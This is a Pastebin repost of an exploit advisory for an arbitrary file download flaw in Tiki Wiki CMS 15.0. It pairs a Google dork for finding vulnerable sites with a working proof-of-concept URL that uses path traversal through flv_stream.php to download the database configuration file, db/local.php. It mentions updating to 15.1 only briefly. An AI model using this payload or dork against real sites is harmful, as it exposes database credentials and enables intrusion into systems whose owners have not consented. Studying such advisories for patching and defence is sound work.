VirusXDz

Exploit Tiki Wiki

Aug 5th, 2016
426
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.75 KB | None | 0 0
  1. #__ ___ __ ______
  2. #\ \ / (_)_ __ _ _ ___\ \/ / _ \ ____
  3. # \ \ / /| | '__| | | / __|\ /| | | |_ /
  4. # \ V / | | | | |_| \__ \/ \| |_| |/ /
  5. # \_/ |_|_| \__,_|___/_/\_\____//___|
  6. ############################################################
  7. # Exploit Title: Tiki Wiki CMS 15.0 Arbitrary File Download
  8. # Date: 11-07-2016
  9. # Software Link: https://tiki.org
  10. # Google Dork: "Powered By Tiki Wiki"
  11. # Category: webapps
  12. ############################################################
  13. 1. Description
  14.  
  15. Using `flv_stream.php` file from `vendor` directory we can download any file.
  16.  
  17. 2. Proof of Concept
  18.  
  19. http://tiki/vendor/player/flv/flv_stream.php?file=../../../db/local.php&position=0
  20.  
  21. 3. Solution:
  22.  
  23. Update to version 15.1
Advertisement
Add Comment
Please, Sign In to add comment